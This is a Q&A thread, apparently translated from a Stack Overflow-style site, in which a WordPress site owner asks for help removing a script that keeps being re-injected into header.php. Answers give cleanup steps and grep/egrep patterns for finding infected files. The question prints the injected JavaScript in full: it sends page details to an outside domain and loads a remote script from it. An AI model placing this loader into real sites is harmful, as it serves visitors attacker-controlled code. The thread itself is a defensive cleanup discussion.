2015-11-17 116 views
-1

寻求熟悉jquery恶意软件的任何人的帮助。我在我的WordPress网站中感染了Injected Script,每次我从Header.php中删除注入的代码24小时后,它已将修改后的版本注入到我的托管服务器上的Header.php文件中。jQuery.min.php我的网站上的恶意软件

让我疯狂。该网站是www.icrsolutions.co.uk和脚本下面写着:

<script> 
var a = ''; 
setTimeout(10); 
var default_keyword = encodeURIComponent(document.title); 
var se_referrer = encodeURIComponent(document.referrer); 
var host = encodeURIComponent(window.location.host); 
var base = "http://uniluxvfc.com/js/jquery.min.php"; 
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; 
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); 
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') { 
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>'); 
} 
</script> 
+0

更改您的密码。他们全部。 – Alex

+0

另外,请确保您使用的是最新版本的WordPress。我在我的网站的一个子目录中有一个旧WP网站(仅用于测试),忘记了它,一年后,一个人设法做了类似于我的事情。谢天谢地,我的网站只是为了搞乱,没什么重要的。我最终只是让那个托管它的人为我删除一切;文件,DB等 –

+0

你正在使用wordpress;最有可能是一个坏/过时的插件 –

回答

1

更改每个密码,然后删除该脚本/恶意代码。

然后,更新每个插件和wordpress本身。

4

以下数据适用的Joomla还有:

  1. 更改所有密码。
  2. 将您的安装和任何附件/模块更新到最新版本。
  3. 识别并清除包含恶意脚本的所有文件。在Linux上,您可以使用以下命令查找文件:grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'
  4. 清除包含任何“有效内容”的所有文件。在Linux上,您可以使用以下来识别这些文件。 将有误报,所以如有疑问,请检查文件是否与您的CMS的新副本相对应。 egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null
+0

我只有在模板索引文件中,他们可能对某人有用,这是一个更快的方式列出它们:find ./ -type f -name index.php -exec grep -l'jquery.min.php'{} \; – sr9yar

相关问题